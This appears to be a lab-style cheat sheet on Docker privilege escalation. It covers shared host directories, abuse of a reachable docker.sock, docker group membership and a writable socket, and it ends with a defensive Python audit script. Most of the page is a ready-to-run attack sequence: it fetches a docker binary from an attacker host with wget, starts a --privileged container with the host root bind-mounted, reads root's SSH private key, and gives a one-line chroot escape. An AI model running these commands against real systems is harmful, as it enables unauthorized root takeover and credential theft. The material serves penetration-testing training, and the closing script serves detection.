Docker

Docker Privilege Escalation

Docker Shared Directories

Sample Exploitation

  1. Find Files

    $ cd /hostsystem/home/cry0l1t3
    root@container:/hostsystem/home/cry0l1t3$ ls -l
    
    -rw-------  1 cry0l1t3 cry0l1t3  12559 Jun 30 15:09 .bash_history
    -rw-r--r--  1 cry0l1t3 cry0l1t3    220 Jun 30 15:09 .bash_logout
    -rw-r--r--  1 cry0l1t3 cry0l1t3   3771 Jun 30 15:09 .bashrc
    drwxr-x--- 10 cry0l1t3 cry0l1t3   4096 Jun 30 15:09 .ssh
    
  2. You found an SSH key and can now log in as that user

    $ cat .ssh/id_rsa
    
    -----BEGIN RSA PRIVATE KEY-----
    <SNIP>

Docker Sockets

A Unix domain socket (docker.sock) through which the docker client talks to the docker daemon. The daemon runs as root, so whoever can write to this socket can ask it to start arbitrary containers, which is why a reachable socket is a privilege-escalation path.

Sample Exploitation

  1. We find a docker.sock file

    $ ls -al
    
    total 8
    drwxr-xr-x 1 htb-student htb-student 4096 Jun 30 15:12 .
    drwxr-xr-x 1 root        root        4096 Jun 30 15:12 ..
    srw-rw---- 1 root        root           0 Jun 30 15:27 docker.sock
  2. Use a docker client binary (transferred to the target, as below) to interact with the socket

    $ wget https://<parrot-os>:443/docker -O docker
    $ chmod +x docker
    $ ls -l
    
    -rwxr-xr-x 1 htb-student htb-student 0 Jun 30 15:27 docker
    
    $ /tmp/docker -H unix:///app/docker.sock ps
    
    CONTAINER ID     IMAGE         COMMAND                 CREATED       STATUS           PORTS     NAMES
    3fe8a4782311     main_app      "/docker-entry.s..."    3 days ago    Up 12 minutes    443/tcp   app
    <SNIP>
  3. Create our own Docker container that maps the host's root directory (/) to the /hostsystem directory in the container

    $ /tmp/docker -H unix:///app/docker.sock run --rm -d --privileged -v /:/hostsystem main_app
    $ /tmp/docker -H unix:///app/docker.sock ps
    
    CONTAINER ID     IMAGE         COMMAND                 CREATED           STATUS           PORTS     NAMES
    7ae3bcc818af     main_app      "/docker-entry.s..."    12 seconds ago    Up 8 seconds     443/tcp   app
    3fe8a4782311     main_app      "/docker-entry.s..."    3 days ago        Up 17 minutes    443/tcp   app
    <SNIP>
  4. Log in to the new container

    $ /tmp/docker -H unix:///app/docker.sock exec -it 7ae3bcc818af /bin/bash
    
    # cat /hostsystem/root/.ssh/id_rsa
    
    -----BEGIN RSA PRIVATE KEY-----
    <SNIP>

Docker Group

Sample Exploitation

  1. We must be in the docker group (or the docker binary has the SUID bit set, or a sudoers rule lets us run docker as root)

    $ id
    
    uid=1000(docker-user) gid=1000(docker-user) groups=1000(docker-user),116(docker)
  2. With this, we can run docker commands directly, e.g. list the available images:

    $ docker image ls
    
    REPOSITORY                           TAG                 IMAGE ID       CREATED         SIZE
    ubuntu                               20.04               20fffa419e3a   2 days ago    72.8MB
  3. Run this command (from GTFOBins; use alpine or an image ID from step 2):

    $ docker run -v /:/mnt --rm -it alpine chroot /mnt sh

Docker Socket

This occurs when we are in neither the root nor the docker group but docker.sock is writable by us. The default path is /var/run/docker.sock.

$ docker -H unix:///var/run/docker.sock run -v /:/mnt --rm -it ubuntu chroot /mnt bash
# 
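The three paths above (a reachable docker.sock, docker group membership, and a --privileged container with the host root bind-mounted) can be audited from the host. The following Python is an added example written for this page, not code from the original: it checks the socket's permissions with os.lstat and flags entries of docker inspect output (passed in as a list of dicts) that run privileged or bind-mount / or the socket, using a constructed sample in place of live data.

```python
"""Audit for the exposures above: a writable docker.sock, --privileged containers,
and containers that bind-mount the host root or the Docker socket."""
import json
import os
import stat

def socket_findings(path="/var/run/docker.sock"):
    """Risk findings for a Docker socket path; [] if it does not exist."""
    findings = []
    try:
        st = os.lstat(path)
    except FileNotFoundError:
        return findings
    if st.st_mode & stat.S_IWOTH:
        findings.append(f"{path}: world-writable, any local user can drive dockerd")
    elif st.st_mode & stat.S_IWGRP and st.st_gid != 0:
        findings.append(f"{path}: writable by gid {st.st_gid}, its members are effectively root")
    return findings

def container_findings(entry):
    """Flag one element of `docker inspect` output (a dict) for host-escape risks."""
    name = entry.get("Name", "?").lstrip("/")
    hc = entry.get("HostConfig") or {}
    findings = []
    if hc.get("Privileged"):
        findings.append(f"{name}: runs --privileged")
    for bind in hc.get("Binds") or []:  # "host-path:container-path[:options]"
        src = bind.split(":", 1)[0]
        if src == "/":
            findings.append(f"{name}: bind-mounts the host root ({bind})")
        elif os.path.basename(src) == "docker.sock":
            findings.append(f"{name}: mounts the Docker socket ({bind})")
    return findings

# Constructed sample in the shape of `docker inspect`; IDs mirror the listing above,
# the names and the first container's bind are made up for the example.
SAMPLE_INSPECT = json.loads("""[
  {"Id": "3fe8a4782311", "Name": "/app",
   "HostConfig": {"Privileged": false, "Binds": ["/srv/app:/app"]}},
  {"Id": "7ae3bcc818af", "Name": "/app2",
   "HostConfig": {"Privileged": true, "Binds": ["/:/hostsystem"]}}
]""")

def audit(inspect_entries, socket_path="/var/run/docker.sock"):
    """Socket findings followed by the findings for every container."""
    found = socket_findings(socket_path)
    for entry in inspect_entries:
        found.extend(container_findings(entry))
    return found
```

To run it against live data, pipe `docker inspect $(docker ps -q)` through json.load and pass the resulting list to audit().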
